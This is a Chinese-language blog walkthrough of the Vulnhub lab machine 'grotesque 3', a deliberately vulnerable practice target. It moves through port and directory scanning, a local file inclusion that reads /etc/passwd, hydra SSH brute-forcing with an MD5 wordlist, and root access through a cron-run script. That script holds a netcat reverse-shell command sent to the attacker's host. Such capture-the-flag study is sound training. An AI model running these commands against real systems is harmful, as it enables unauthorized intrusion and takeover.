靶场实战 Vulnhub

grotesque 3

grotesque 3

Posted by Kyon-H on July 18, 2023

1. 信息搜集

IP 扫描,发现主机 192.168.163.142

image.png

端口扫描,发现 80、22 端口

1

nmap -A -p- 192.168.163.142

image.png

目录扫描,但未扫到任何东西

1
2
3

dirsearch -u http://192.168.163.142 -e* -i 200
nikto -h 192.168.163.142
dirb http://192.168.163.142

访问网站,发现链接

image.png

访问链接: http://192.168.163.142/atlasg.jpg 发现一张图片

从图片中找有字符的地方

image.png

MD 和 5 个 X,暗示 MD5

使用 atlasg、atlasg.jpg 和图片文件的 MD5 值尝试访问失败

2. 目录爆破

生成 MD5 的目录字典

1

for i in $(cat /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt); do echo $i | md5sum >> md5.txt; done

vim 删除多余字符

1

:%s/  -//g

1

dirsearch -w md5.txt -u http://192.168.163.142 -f php

image.png

http://192.168.163.142/f66b22bf020334b04c7d0d3eb5010391.php

1

wfuzz -w /usr/share/wordlists/rockyou.txt -u http://192.168.163.142/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=/etc/passwd --hw 0

发现文件包含漏洞

image.png

发现用户:freddie

image.png

尝试日志注入,无法获取日志文件,尝试爆破 ssh

3. SSH 爆破

使用之前生成的 MD5 字典进行爆破

1

hydra -l freddie -P md5.txt ssh://192.168.163.142

image.png

获得密码:61a4e3e60c063d1e472dd780f64e6cad

ssh 登陆成功,发现日志文件目录权限高,无法访问

image.png

查看家目录

image.png

查看 flag 文件

image.png

查看端口服务,发现 139、445

1

ss -tnlp

image.png

使用 smbclient 访问 SMB 服务中的文件共享

1

smbclient -L 127.0.0.1

发现目录 grotesque

image.png

查看,无内容

image.png

下载 pspy64 DominicBreuker/pspy: Monitor linux processes without root permissions 监控 Linux 进程和定时任务

上传到目标机

image.png

1
2

chmod +x pspy64
./pspy64

发现每分钟以 root 身份执行/smbshare目录下脚本

image.png

4. root 提权

添加自定义脚本,反弹 shell

1

echo 'nc -nv 192.168.163.132 4444 -e /bin/bash' > shell.sh

直接写入无权限,利用 smb 传入脚本文件

1
2

smbclient //127.0.0.1/grotesque
put shell.sh

image.png

kali 开启监听 nc -lvp 4444

连接成功获取到 flag

image.png

CATALOG
    FEATURED TAGS
    DVWA 靶场实战 Vulnhub DC系列 服务器 CTFHub Ubuntu 内网防护 渗透测试